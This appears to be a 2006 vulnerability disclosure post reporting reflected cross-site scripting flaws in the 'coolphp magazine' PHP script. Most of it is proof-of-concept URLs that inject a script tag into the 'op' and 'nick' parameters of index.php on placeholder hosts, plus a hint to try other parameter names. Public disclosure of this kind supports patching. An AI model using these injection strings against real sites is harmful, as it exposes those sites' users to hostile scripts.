Subject: Multiple Xss exploits in coolphp magazine
Date: 27 May 2006 14:25:31 -0000
Multiple Xss exploits in coolphp magazine
script type : coolphp magazine
bug found by : black-code & sweet-devil
team : site-down
type : Xss
Codes :
*******
http://www.xxx.com/coolphp/index.php?op='><script>alert(10)</script>
http://www.xxx.com/coolphp/index.php?op=userinfo&nick='><script>alert(10)</script>
*******
And :
http://www.xxx.com/coolphp/index.php?op=0000='><script>alert(10)</script>
Put instaed of 0000 any name as :
http://xxx.net/coolphp/index.php?op=userinfo='><script>alert(10)</script>
or
http://xxx.net/coolphp/index.php?op=comp_der='><script>alert(10)</script>
or
http://xxx.net/coolphp/index.php?op=encuestas='><script>alert(10)</script>
or
http://xxx.net/coolphp/index.php?op=pagina='><script>alert(10)</script>
Emails :
Black-cod3@xxxxxxxxxx
gamr-14@xxxxxxxxxxx
All my respect to my friend sweet-devil , lezr.com , g123g.net ..
done .. peace